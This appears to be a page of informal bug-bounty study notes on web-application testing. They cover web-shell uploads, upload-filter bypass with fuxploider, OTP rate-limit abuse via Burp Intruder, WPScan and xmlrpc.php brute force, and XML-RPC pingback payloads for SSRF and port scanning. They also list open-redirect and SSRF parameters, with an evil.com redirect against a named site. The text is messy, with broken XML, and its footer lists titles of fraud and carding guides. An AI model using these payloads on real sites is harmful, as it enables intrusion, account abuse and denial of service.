http://127.0.0.1:22

https://127.0.0.1:443
http://0.0.0.0:80

http://0.0.0.0:22

https://0.0.0.0:443
http://[::]:80/
http://[0000::1]:80/
Proxy > Intruder > numbers at payloads sets > 1-1024

https://h.43z.one/ipconverter/

File upload

A file upload vulnerability occurs when a web application does not properly validate or sanitize files
uploaded by users. This can allow attackers to upload malicious files, such as web shells, scripts, or
executables, which can then be used to compromise the system.
How the server Validate's :

1. File Name Validation

2. Extension Validation

3. Content Type

4. Content Inspection

5. File Size Validation

Just search on Google for web shells. For example, search 'AK47 web shell'. You can also explore
others like b374k shell, WSO shell, R57, C99, and China Chopper.

Download a .php web shell file and upload it to a website wherever there’s a file upload functionality

https://github.com/BlackArch/webshells/blob/master/php/AK-
74%20Security%20Team%20Web%20Shell%20Beta%20Version.phpcsrf

Bypass Methods:
git clone https://github.com/almandin/fuxploider

cd fuxploider

pip3

python3 fuxploider.py -u http://192.168.29.86/owaspbricks/upload-1 --not-regex "wrong file type"

.php1 , .php2 , .php3 , .php4 , .php5

No rate vulnerability

Sending an excessive number of phone OTPs without restriction

Sending unlimited email OTPs

Repeated sending of WhatsApp OTPs

Sending multiple password reset links without rate limiting

Abusing resend OTP functionality

Triggering verification messages repeatedly

Spamming user invitation or referral links

Unrestricted API requests to OTP or reset endpoint

Step-by-Step: Intercept OTP or Token Request

Open Burp Suite and set up your browser to use Burp’s proxy (127.0.0.1:8080).

Go to the target site and perform an action that sends an OTP (e.g., enter your phone/email).

In Proxy > HTTP history, find the POST or GET request responsible for OTP delivery.

Look for endpoints like: /send-otp, /request-otp, /generate-otp, etc.

It often contains parameters like phone, email, or channel=whatsapp.

1. Send the Request to Intruder

In HTTP history, right-click on the OTP request.

Select “Send to Intruder”.

2. Send the Request to Sequencer

If the request or response contains an OTP code or session token (like a cookie or verification
code), you can analyze its randomness.

Right-click the request in HTTP history → Select “Send to Sequencer”.

Step-by-Step Instructions

1. Intruder → Positions Tab

Click Clear to remove automatic payload markers

Manually highlight the parameter to inject payloads into:

Could be: content length , expires , accept language 0.5 or part of the body { at 5 value }

(Optional) You can also highlight a header like Accept-Language to vary it as a bypass technique

2. Intruder → Payloads Tab

Payload Type: Numbers

From: 1

To: 500

Step: 1

This will send 500 requests, simulating repeated OTP requests.

3. Start Attack

Click Start Attack

Monitor the responses:

Status Code: 200 OK consistently

Content Length remains same (e.g., "OTP sent")

No error or blocking message

No increasing delay

Signs of No Rate Limiting

OTP is sent every time without restriction

No CAPTCHA or blocking after multiple requests

Status and response body remain unchanged

No cooldown timer or IP lock

Sequencer tab through :

Go to the Sequencer tab.

Select the correct token location (Burp may auto-detect a session cookie or OTP in the response).

Click Start live capture.

Wordprees {cms }

WPScan is a command-line tool used by security professionals and developers to identify known
security issues in WordPress core, themes, and plugins. It uses a vulnerability database maintained
by the WPScan team.

Enumerate all :

wpscan --url https://yourwebsite.com -e ap --api-token YOUR_TOKEN

wpscan --url https://yourwebsite.com -e at--api-token YOUR_TOKEN

vulnerable only :

wpscan --url https://yourwebsite.com -e vp --api-token YOUR_TOKEN

wpscan --url https://yourwebsite.com -e vt --api-token YOUR_TOKEN

https://wpscan.com/ { Register and get api token }

Using --random-user-agent can help bypass basic firewalls or bot detection, but it has limited
effectiveness against advanced Web Application Firewalls (WAFs)

What is xmlrpc.php?

xmlrpc.php is a file in WordPress that enables remote communication between your WordPress site
and external applications using the XML-RPC protocol. This allows programs (like mobile apps or
other websites) to interact with your WordPress site remotely.

What Does It Do?

XML-RPC allows external systems to send commands to WordPress using XML-formatted requests
over HTTP. These commands can:

Create, edit, or delete posts

Upload media

Manage comments

Get recent posts or comments

Manage categories and tags

Perform user authentication

Use remote publishing tools like the WordPress mobile app, Jetpack, or MarsEdit
Example Use Case:
You’re using the official WordPress mobile app. It needs to connect to your site to publish a blog
post. It uses xmlrpc.php to do that.

Attack’s :

1.Brute force wordpress websites

2.DOS

3.List Users

inurl:"/xmlrpc.php?rsd"

intitle:"WordPress" inurl:"readme.html"

allinurl:"wp-content/plugins/"

Enumerate users :
https://www.thefreecat.org/wp-json/wp/v2/users

wpscan --url https://yourwebsite.com -e u

https://thefreecat.org/wp-sitemap-users-1.xml

Open the target link in your browser and intercept the request using Burp Suite.
Once intercepted, forward that request to the Repeater tab.

In the Repeater, right-click the request and select "Change request method".now get request
changed to post and forward , You should see a 200 OK status in the response.

Now, append the following XML code at the end of the request packet,
It will display all methods

https://github.com/rm-onata/xmlrpc-attack

<?xml version="1.0" encoding="utf-8"?>

<methodName>system.listMethods</methodName>

</methodCall>

6.checking server responding or not to me.

<?xml version="1.0" encoding="utf-8"?>

<methodName>demo.sayHello</methodName>

</methodCall>

in order to determine whether the xmlrpc.php file is enabled or not

In the server’s response, you should see the message "hello".

XML-RPC ping back attack’s :

Impact :DOS, Cross site port attack , ssrf

<?xml version="1.0" encoding="UTF-8"?>

<methodName>pingback.ping</methodName>

<param>

<value><string>https://postb.in/1562017983221-4377199190203</string></value>

</param>

<param>

<value><string>https://thefreecat.org/</string></value>

</param>

</params>

</methodCall>

https://www.postb.in/ { you will get response in this site }

[ OR ]

<?xml version="1.0" encoding="UTF-8"?>

<methodName>pingback.ping</methodName>

<param>

<value><string>http:// hr03rl6g.requestrepo.com/</string></value>

</param>

<param>

<value><string>http://localhost/wordpress/?p=1/</string></value>

</param>

</params>

</methodCall>

https://requestrepo.com/ { you will get response in this site }

Finally , we can capture the server’s real IP address even if it is behind a proxy or firewall or web
firewall , CDN etc..

Port Scan :

<?xml version="1.0" encoding="UTF-8"?>

<methodName>pingback.ping</methodName>

<param>

<value><string>http:// hr03rl6g.requestrepo.com:21</string></value>

</param>

<param>

<value><string>http://localhost/wordpress/?p=1/</string></value>

</param>

</params>

</methodCall>

Note : change port numbers at 21

Note 2 :In the response if you get fault code and a value greater then 0 , then it means the port is
open , you can verify this by checking your server logs.

Remediation:
If the XMLRPC.php file is not being used, it should be disabled and removed completely to avoid any
potential risks. Otherwise, it should at the very least be blocked from external access.
Brute force login password :through burp suite intruder

At method name , provide method name

wpscan --password-attack xmlrpc -t 20 -U <spesific-user> -P /wordlist-directory/example.txt --url

http://<wordpress-target>/

Find any company email to report the vulnerability only :

https://jiomeetpro.jio.com/.well-known/security.txt

EXIF Metadata Not Being Stripped

Visit any target site and find all images on that site and copy url of image and find exif data using exif
tools if the location or device details leaked that is vulnerable.

2FA & multi factor authentication misconfiguration

P4 – bug

https://hackerone.com/reports/2234736
https://hackerone.com/reports/1927360

Impact :

1/ Compromised user data: If an attacker gains access to a user's account before 2FA is activated,
they can continue to access the account even after 2FA is enabled. This can result in the theft of
sensitive user data, such as personal information, financial details, and other confidential data.

2/ Financial loss: A compromised user account can also lead to financial loss if the attacker makes
unauthorized transactions, transfers funds, or purchases items using the user's payment information.

3/ Reputational damage: If users' accounts are compromised due to this security vulnerability, it can
damage the reputation of the service provider. Users may lose trust in the platform and may be less
likely to use it in the future.

4/ Legal consequences: In some cases, the service provider may be held liable for damages resulting
from the security vulnerability, which could lead to legal and financial consequences.

5/ Operational costs: Fixing this security vulnerability will require resources and time to implement
the necessary measures. This can result in operational costs for the service provider, including
development, testing, and communication with users.

6/ Regulatory compliance: Depending on the nature of the platform and the data it processes, this
vulnerability may be a violation of regulatory requirements, leading to fines or other penalties.

Recommended Solution :
Upon enabling 2FA on one device, all other active sessions associated with the same account should
be immediately terminated.

XXE
XXE.xml = File name format

Paste payload after xml= payload { encoded format}

OPTIONS

Come one step back also

JWT
Open burp suite > extenisons > bapp store > jwt editor > install

Proxy > http history > In green colour indicate some request’s because of jwt editor extension choose
only that requests only .

Open Redirection :
url

redirect

redirect_uri

redirect_url

redir

rurl
destination

dest

next_page

return

returnTo

return_to

return_url

continue

continue_url

checkout_url

forward

forward_url

image_url

view

view_url

page
page_url

file_url

file_name

folder_url

folder

login_url

img_url

return_path

load_url

load_file

turl

redirect_to

redirect

redirect_uri

redirect_url

redirect

/redirect/

/cgi-bin/redirect.cgi

/out/

/out?

/login?to=

/image_url=

/go=

/return=

/returnTo=

/return_to=

/checkout_url=

/continue=

/return_path=

/loginto

Path
link

target

rurl

ink

del

file

Example : next=https://google.com

waybackurls dishtv.in | grep “=http”

and manual search in this site also

bypass fire base :

https://dishtv.in.page.link/?link=https%3A%2F%2Fsiteproxy.ruqli.workers.dev%3A443%2Fhttps%2Fwww.evil.com?https://www.dishtv.in/
Weak password policy vulnerability

I can able to create account with very weak pass like 123456
Increases risk of bruteforce and credential stuffing attacks

No Email or Phone Verification

Steps to Reproduce:

1. Visit https://flightdemy.com/register

First Name: sai

Last Name: jain

Email: [email protected]

Phone Number: 9501795017

Password: 12345678 or 11111111

2. Submit the registration form

Complete the above registration process

No verification email or SMS OTP is sent

User can continue using the account without confirming any contact info

Impact:

Allows creation of fake or disposable accounts

Insecure account removal :

Impact:

This lack of password confirmation can cause serious issues:

1. Accidental Deletion: Users might unintentionally delete their accounts without realizing the
consequences.

2. Malicious Activity: Attackers with temporary access to the device or session can delete accounts
without authorization.

3. Loss of Trust: Users may lose confidence in the platform due to insecure account deletion
processes.

4. Unintended Data Loss: Irrecoverable loss of valuable user data if the account is deleted
accidentally or maliciously.

5. Security Risk: Absence of verification steps increases vulnerability to unauthorized deletions,

impacting platform integrity.

Recommendation:

Implement a mandatory password confirmation step before account deletion.

Consider adding multi-factor authentication (MFA) for critical actions like account removal.

Display clear warnings about the consequences of account deletion.

Log account deletion actions with user details and timestamps for audit purposes.
Provide an option to recover deleted accounts within a grace period to prevent permanent loss.

Inject in get method { parameter’s } ,post {submit forms etc }

SSRF (Server-Side Request Forgery) to Trigger External DNS Interaction

SSRF is a type of attack where an attacker can make the server send requests to internal resources or
any arbitrary URLs. By exploiting SSRF vulnerabilities, attackers can trigger requests to external DNS
servers or services, which can be leveraged for various purposes like:

Parameter’s : url

uri

path

domain

host

website
site

continue

data

reference

redir

redirect

callback

return

returnTo

page

img

image_url

load

file

file_url

open

out
to

target

dest

destination

fetch

feed

link

src

source

navigation

proxy

port

remote

address

remote_url

video_url

audio_url

avatar

background

api

endpoint

objectUrl

Inject after parameter , ex id=http://burp collaborator code

in burp suite click poll now > you will see the request and see the request you will see ip
Mobile Number Verification Bypass allows Registration of Restricted Country

Steps:

1. Visit the sign-up page of any website and complete the email verification process.

2. When prompted for mobile number verification, note that some websites do not list certain
countries like India (+91).

3. Select any country code that is allowed and enter a random phone number from that country.

4. Intercept the outgoing HTTP request using a proxy tool (like Burp Suite).

5. Modify the intercepted request: replace the selected country code and phone number with the
Indian country code (+91) and your desired Indian phone number.

6. Forward the modified request.

7. Monitor to see if the OTP is received on the Indian number.

8. Enter the received OTP to complete the verification.

9. If successful, the account will be created using the Indian number. After logging in, check the
dashboard to confirm the number is linked to the account.

Missing Server-Side Validation in the Password Change Feature

Steps to Identify the Issue:

1. Go to any website's login page and log in with valid credentials.

2. After logging in, navigate to the Dashboard > Change Password section.

3. Enter your current password, and for both "New Password" and "Confirm Password," enter the
same value as your current (old) password.

4. When you click "Submit," the application will show an error saying "Old and new passwords
should not be the same."

This is a client-side validation (browser-side).

5. Now open Burp Suite and turn Intercept ON.

6. Go back to the password change form:

Enter your current password.

Set a different new password and confirm password (to pass client-side check).

7. When the request is intercepted by Burp Suite, modify the request:

Change the new password and confirm password values to the same as the current (old) password.

8. Forward the modified request to the server.

9. If the server responds with a 200 OK status and the password is successfully updated (despite old
and new being the same),

it means the restriction was only on the client side.

10. If there was proper server-side validation, the server would reject the request and return an
error.

Password reset link does not expire after changing the email address — leads to Account Takeover

Steps to Reproduce:
1. Log in to your account using Browser A.

2. In Browser B, open the password reset page and request a reset using your current email address.

3. Go back to Browser A, go to the account settings, and change the email address to a new one.

If verification is required, verify it using the link sent to the new email address.

4. Now, return to Browser B and open the password reset link that was sent to the old email address
(before the email change).

5. If the link still works and allows you to set a new password, this is a security vulnerability, because
the reset link from the old email is still valid even after the email address has been changed.

Reference : 685007 – Hacker one Report id

Cache Control Misconfiguration on a Login Website

1. Login to the website using your credentials.

2. After logging in, go to the logout option and click it to log out.

3. Now, click the back button (<) in your browser (e.g., the browser's back arrow).

Expected Behavior:
You should not be able to see any content from the previous (logged-in) page after logging out. The
browser should redirect you to the login page or display an error (like "Session expired").

Actual Behavior (Issue):

After clicking the back button, the browser displays the content of the previous (authenticated)
page, even though you've already logged out.

P4 bug – hacker one , bug crowd will acepect

https://gaya3-r.medium.com/cache-control-header-is-missing-for-a-sensitive-page-168ac9f43e12

https://hackerone.com/reports/231805

https://jenish03.medium.com/improper-cache-control-vulnerability-f2604038615a
Reset password link sent over unsecured http protocol

Go to the "Forgot Password" page of any website.

Enter your email address in the provided field to request a password reset.

Check your email inbox for the password reset email from the website.
Open the email and find the password reset link inside.

Copy the URL of the password reset link to your clipboard.

Paste the URL somewhere (e.g., in a text editor) and observe it.

Look at the beginning of the URL — you will see whether it uses the HTTP protocol.

Cvss :7.3( HIGH)

Mitigation:

Generate reset password link with secured https protocol.

Impact

If the victim opens the reset password link and forgot to update the password, anyone from
intermediate computers through network or sniffer can reset the password.

https://hackerone.com/reports/1888915
Session Not Invalidated After Account Deletion

Steps to Reproduce:

1. Open Browser A (e.g., Chrome):

o Go to the target application.

o Log in with a valid user account.

2. Open Browser B (e.g., Firefox or Incognito):

o Go to the same application.

o Log in using the same user account credentials.

o Verify that both sessions are active and functional.

3. In Browser A:

o Navigate to the account settings page.

o Choose “Deactivate” or “Delete Account” (whichever is available).

o Confirm the deactivation/deletion of the account.

4. Return to Browser B:

o Try performing any authenticated actions:

▪ Visit dashboard or profile page

▪ Access sensitive data (messages, settings, orders)

▪ Make API requests or form submissions

o Observe whether the session remains active or access is still possible.

Expected Behavior:

• Upon account deactivation/deletion in Browser A, the session in Browser B should be

immediately terminated.

• Any request from Browser B should result in a 401 Unauthorized or redirect to login page.

Actual Behavior (Bug):

• Session in Browser B remains active even after account is deactivated.

• The user can continue accessing and interacting with the application.

• This results in unauthorized access to a deleted/deactivated account.

Impact:

• Broken session invalidation.

• Violates user expectation and platform integrity.

• Actually Website need to force logout from all browser after deleting account.

Recommendation:

• On account deactivation/deletion, invalidate all active sessions (server-side).

• Implement a session/token revocation system.

• Ensure all requests post-deactivation return proper auth errors.

Improper Session Invalidation – Auto Sign-In Without Credentials After Logout

Steps to test for an automatic login vulnerability :

1. Go to any website and log in with valid credentials.

2. Click on the dashboard or navigate to any authenticated page.

3. Click the "Logout" button — this should log you out and end the session.

4. Now, click the "Login" button again without entering any credentials.

If you are automatically logged in again without needing to re-enter your username and password,
the website may be vulnerable.

Impact

• Logout becomes meaningless, giving a false sense of security.

• If someone else gains temporary or physical access to the browser, they can easily regain
access to the account without credentials.

• Risk is amplified in environments like internet cafés, libraries, or if a device is lost/stolen.

Recommendation:

• Properly invalidate the session on the server.

• Remove all tokens/cookies from the browser.

• Set cache-control headers to prevent session restoration via back/forward navigation.

• Consider revoking refresh tokens where applicable

Cvss :4-6.9 (Medium)

Dust | Report #3101207 - Improper Session Invalidation – Auto Sign-In Without Credentials After
Logout (Affects Chrome & Firefox) | HackerOne

V Methods
No ratings yet
V Methods
29 pages
Bug Hunting
No ratings yet
Bug Hunting
27 pages
The Thing
No ratings yet
The Thing
6 pages
CYBER SECURITY USING PYTHON Sysnosis
No ratings yet
CYBER SECURITY USING PYTHON Sysnosis
8 pages
Google VRP Bug Hunting Guide
No ratings yet
Google VRP Bug Hunting Guide
54 pages
Bug Bounty Report Template Detailed
No ratings yet
Bug Bounty Report Template Detailed
2 pages
ShadowFox Tasks (HARD)
No ratings yet
ShadowFox Tasks (HARD)
16 pages
Spot The Web Vulnerability
No ratings yet
Spot The Web Vulnerability
35 pages
Lesson 2 ITWS04
No ratings yet
Lesson 2 ITWS04
34 pages
How To Do Bug Bounty
No ratings yet
How To Do Bug Bounty
1 page
Lessons
No ratings yet
Lessons
1 page
Bug Bounty Guide for Researchers
No ratings yet
Bug Bounty Guide for Researchers
21 pages
Bug Bounty Playbook V2 PDF
80% (10)
Bug Bounty Playbook V2 PDF
250 pages
#1 Penetration Testing Internship Report
No ratings yet
#1 Penetration Testing Internship Report
18 pages
Documentation PDF
No ratings yet
Documentation PDF
24 pages
Real World Bug Hunting A Field Guide To Web Hacking 1st Edition Peter Yaworski Fast Download
No ratings yet
Real World Bug Hunting A Field Guide To Web Hacking 1st Edition Peter Yaworski Fast Download
136 pages
CE641 - W1 Intro To Computer Security
No ratings yet
CE641 - W1 Intro To Computer Security
52 pages
Assignment No 5 Vulnerability Management
No ratings yet
Assignment No 5 Vulnerability Management
19 pages
Report
No ratings yet
Report
17 pages
Web Application Security: Vulnerabilities, Attacks, and Countermeasures
No ratings yet
Web Application Security: Vulnerabilities, Attacks, and Countermeasures
72 pages
Advance Ethical Hacking Bug Bounty Hunting & Penetration Testing PDF
No ratings yet
Advance Ethical Hacking Bug Bounty Hunting & Penetration Testing PDF
17 pages
Security Audit & OWASP Analysis
No ratings yet
Security Audit & OWASP Analysis
17 pages
EH 107 Introduction To Hacking
No ratings yet
EH 107 Introduction To Hacking
57 pages
01 - Roadmap To Bugbounty - Reconnaisance
No ratings yet
01 - Roadmap To Bugbounty - Reconnaisance
38 pages
Handout 2.1 Ethical Hacking Pentesting and Anonymity
No ratings yet
Handout 2.1 Ethical Hacking Pentesting and Anonymity
23 pages
Week 1 Report
No ratings yet
Week 1 Report
9 pages
Lecture #16. Web Security
No ratings yet
Lecture #16. Web Security
30 pages
E-Commerce Module4
No ratings yet
E-Commerce Module4
59 pages
Web Sec Pres Notes
No ratings yet
Web Sec Pres Notes
19 pages
Bug Hunting 2025
No ratings yet
Bug Hunting 2025
3 pages
Bug Bounty Playbook V2v
No ratings yet
Bug Bounty Playbook V2v
250 pages
23CV3 ST#is#7637 Assignment 10
No ratings yet
23CV3 ST#is#7637 Assignment 10
7 pages
Brochure Designforoduwacoin
No ratings yet
Brochure Designforoduwacoin
7 pages
Task 2
No ratings yet
Task 2
10 pages
Lab 1
No ratings yet
Lab 1
14 pages
Ethical Hacking C'Measure Revision
No ratings yet
Ethical Hacking C'Measure Revision
14 pages
Vapt 1
No ratings yet
Vapt 1
18 pages
PROJECT Yhills
No ratings yet
PROJECT Yhills
27 pages
Ethical Hacking Workshop Report
No ratings yet
Ethical Hacking Workshop Report
21 pages
Web Security
No ratings yet
Web Security
23 pages
TASK1
No ratings yet
TASK1
12 pages
Cargill Web Application Scanning Report
No ratings yet
Cargill Web Application Scanning Report
27 pages
Week 2 Penetration Testing Report
No ratings yet
Week 2 Penetration Testing Report
6 pages
HCPT Sample Report
No ratings yet
HCPT Sample Report
7 pages
Phishing and Malicious Javascript: John Mitchell
100% (3)
Phishing and Malicious Javascript: John Mitchell
40 pages
Vulnerabilities in Web Applications
No ratings yet
Vulnerabilities in Web Applications
6 pages
Web Security Testing
No ratings yet
Web Security Testing
11 pages
WAPT Report
No ratings yet
WAPT Report
28 pages
1731240521559
No ratings yet
1731240521559
11 pages
gKccGnAzQBiqnsjs0WZE - Week 1 Report Template
No ratings yet
gKccGnAzQBiqnsjs0WZE - Week 1 Report Template
6 pages
Bug Bounty For Beginners
No ratings yet
Bug Bounty For Beginners
24 pages
BH Learn
No ratings yet
BH Learn
3 pages
Lecture 3
No ratings yet
Lecture 3
6 pages
Bug Bounty Hunting Process
No ratings yet
Bug Bounty Hunting Process
20 pages
Wa0019.
No ratings yet
Wa0019.
12 pages
Vulnerability Assessment
No ratings yet
Vulnerability Assessment
12 pages
Auditing and Securing Web Enabled Applications
No ratings yet
Auditing and Securing Web Enabled Applications
5 pages
Mobile Check Fraud Guide 2023
98% (46)
Mobile Check Fraud Guide 2023
18 pages
Ethical Hacking with Google Dorks
100% (23)
Ethical Hacking with Google Dorks
5 pages
How To Get Credit Cards With Funds
85% (60)
How To Get Credit Cards With Funds
2 pages
Fraud Tactics for Beginners
80% (41)
Fraud Tactics for Beginners
6 pages
Credit Card Fraud Tactics Explained
79% (43)
Credit Card Fraud Tactics Explained
6 pages
Illegal Hacking and Carding Methods
86% (21)
Illegal Hacking and Carding Methods
17 pages
Carding Tutorial For Beginners 2024
93% (27)
Carding Tutorial For Beginners 2024
10 pages
Illegal Carding Methods and Sites Guide
88% (17)
Illegal Carding Methods and Sites Guide
110 pages
56 Pages of Methods
88% (116)
56 Pages of Methods
49 pages
PDF Fraud Bible 1 Compress
90% (60)
PDF Fraud Bible 1 Compress
123 pages
Credit Card Fraud Guide
80% (30)
Credit Card Fraud Guide
8 pages
Open CC and Get 10K Instantly Approved
87% (23)
Open CC and Get 10K Instantly Approved
6 pages
How To Use Google Dorks For Credit Cards Details
64% (11)
How To Use Google Dorks For Credit Cards Details
8 pages
Credit Card Fraud Guide & Tools
85% (20)
Credit Card Fraud Guide & Tools
27 pages
How To Check Client or Fullz Credit Score@Baddestupdate
90% (20)
How To Check Client or Fullz Credit Score@Baddestupdate
7 pages
The Big List of Card Shops 2021 - Best Carding Sites For CVV and Fullz
80% (15)
The Big List of Card Shops 2021 - Best Carding Sites For CVV and Fullz
1 page
Loan Fraud Guide for Hackers
93% (14)
Loan Fraud Guide for Hackers
7 pages
Black Book of Crime
80% (15)
Black Book of Crime
39 pages
2024 Latest Cashapp Method 1-2
84% (31)
2024 Latest Cashapp Method 1-2
7 pages
??,??,?? Mega List 300+ Sites & Method
88% (17)
??,??,?? Mega List 300+ Sites & Method
63 pages
Full Tutorial
83% (24)
Full Tutorial
45 pages
Google Hacking Database
75% (20)
Google Hacking Database
91 pages
Corce
70% (47)
Corce
206 pages
Fullz Loan Cashout Guide: Brought To You by
82% (56)
Fullz Loan Cashout Guide: Brought To You by
5 pages
How To Order Free Phones On Verizon
91% (34)
How To Order Free Phones On Verizon
17 pages
How To Make The World Your Bitch For Free: Chapter 1 - Virtual Carding
96% (23)
How To Make The World Your Bitch For Free: Chapter 1 - Virtual Carding
33 pages
7839+ Awesome Deep Web Onion Links List (Uncensored Content) PDF
76% (37)
7839+ Awesome Deep Web Onion Links List (Uncensored Content) PDF
391 pages
300
70% (27)
300
18 pages
Bank Scam Tutorials
88% (8)
Bank Scam Tutorials
3 pages
WESTERN UNION METHOD - 3000 - Per Day 100 - Working @SpamLord00
86% (42)
WESTERN UNION METHOD - 3000 - Per Day 100 - Working @SpamLord00
5 pages
CGI Programming: Python3 Advanced #7
No ratings yet
CGI Programming: Python3 Advanced #7
12 pages
S.4 Computer Studies Exam 2023
No ratings yet
S.4 Computer Studies Exam 2023
11 pages
10th Computer Science Half and Full Book
No ratings yet
10th Computer Science Half and Full Book
6 pages
Security Issues Posssed by Shared Images
No ratings yet
Security Issues Posssed by Shared Images
5 pages
DBT Cloud Advanced Architecture Guide
0% (1)
DBT Cloud Advanced Architecture Guide
4 pages
Proazure: Welcome To Proazure Software Solutions Pvt. Ltd. Pune
No ratings yet
Proazure: Welcome To Proazure Software Solutions Pvt. Ltd. Pune
6 pages
Online Ticket Reservation System
No ratings yet
Online Ticket Reservation System
43 pages
Falcon Sensor For Linux Modes: Kernel Mode
No ratings yet
Falcon Sensor For Linux Modes: Kernel Mode
7 pages
Features of Java
No ratings yet
Features of Java
6 pages
Joption Method
No ratings yet
Joption Method
10 pages
XI CS Types of Software Notes
No ratings yet
XI CS Types of Software Notes
4 pages
Placement Portal Management System
No ratings yet
Placement Portal Management System
29 pages
Paxstore Features v10
No ratings yet
Paxstore Features v10
11 pages
Ics 2104 Object Oriented Programming I (Java)
No ratings yet
Ics 2104 Object Oriented Programming I (Java)
3 pages
It QB Cs8494 Software Engineering
No ratings yet
It QB Cs8494 Software Engineering
82 pages
Arrays in Fast Formula
No ratings yet
Arrays in Fast Formula
12 pages
Understanding OO vs. Procedural Programming
No ratings yet
Understanding OO vs. Procedural Programming
2 pages
Serialization
No ratings yet
Serialization
16 pages
204.4128.29 - DmView-9.0 - Installation Manual
No ratings yet
204.4128.29 - DmView-9.0 - Installation Manual
94 pages
Fortran - Fortran Examples - Wikibooks, Open Books For An Open World
No ratings yet
Fortran - Fortran Examples - Wikibooks, Open Books For An Open World
93 pages
Drop Box
No ratings yet
Drop Box
42 pages
Veeam Backup 11 0 Quick Start Guide Vsphere
No ratings yet
Veeam Backup 11 0 Quick Start Guide Vsphere
127 pages
Simple Horserace Game Worksheet For Visual Basic 2008
No ratings yet
Simple Horserace Game Worksheet For Visual Basic 2008
4 pages
CSCI 320 Computer Architecture. Handbook On Verilog HDL
No ratings yet
CSCI 320 Computer Architecture. Handbook On Verilog HDL
32 pages
Documento 55
No ratings yet
Documento 55
3 pages
Java Questions Paper 2015-19
No ratings yet
Java Questions Paper 2015-19
7 pages
SE - Unit One
No ratings yet
SE - Unit One
54 pages
Materi Praktik Perintah Run (Perintah Singkat) : Tombol Windows + R ..Enter (Untuk Dibuka Saja Diamati Kemudian Ditutup)
No ratings yet
Materi Praktik Perintah Run (Perintah Singkat) : Tombol Windows + R ..Enter (Untuk Dibuka Saja Diamati Kemudian Ditutup)
3 pages
Surekha K Summary
No ratings yet
Surekha K Summary
3 pages
Pcs Should Allow To Remove A Dead Node From A Cluster
No ratings yet
Pcs Should Allow To Remove A Dead Node From A Cluster
5 pages